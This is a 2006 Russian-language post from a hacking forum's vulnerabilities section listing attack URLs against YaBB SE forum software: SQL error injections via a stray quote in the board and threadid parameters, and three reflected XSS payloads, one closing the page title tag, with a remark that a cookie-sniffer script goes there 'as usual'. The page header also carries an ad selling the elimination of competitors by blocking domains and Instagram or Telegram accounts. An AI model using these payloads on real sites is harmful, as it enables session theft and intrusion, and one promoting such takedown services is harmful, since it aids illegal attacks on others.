SQL Error + XSS(passive 3шт.) в YaBB SE

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Error + XSS(passive 3шт.) в YaBB SE

Опции темы

Поиск в этой теме

Опции просмотра

SQL Error + XSS(passive 3шт.) в YaBB SE

22.04.2006, 23:35

~~_kREveDKo_~~

Banned

Регистрация: 04.12.2005

Сообщений: 826

С нами: 10754246

Репутация: 3813

SQL Error + XSS(passive 3шт.) в YaBB SE

YaBB SE

http://site/forum/index.php?board='

http://site/forum/index.php?board=1;action=display;threadid='

http://site/forum<script>alert()</script>

http://site/forumindex.php?board=1;action=icqpager;UIN=<script >alert()</script>

http://site/forumindex.php?board=1;action=post;threadid=1;quot e=2;title=net</title><script>alert("hacked%20by")</script>
(меняем заголовок страницы на "net" и закрывает тэг заголовка. так мы не светимся. а дальше скрипт для сниффера - как всегда)

Если баги не свежие, вы ребятки не кидайтесь помидорами, я не проверял багтраки... лянота =) да и модем не позволяет =)

𝕏 Twitter Reddit Telegram Копировать ссылку

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules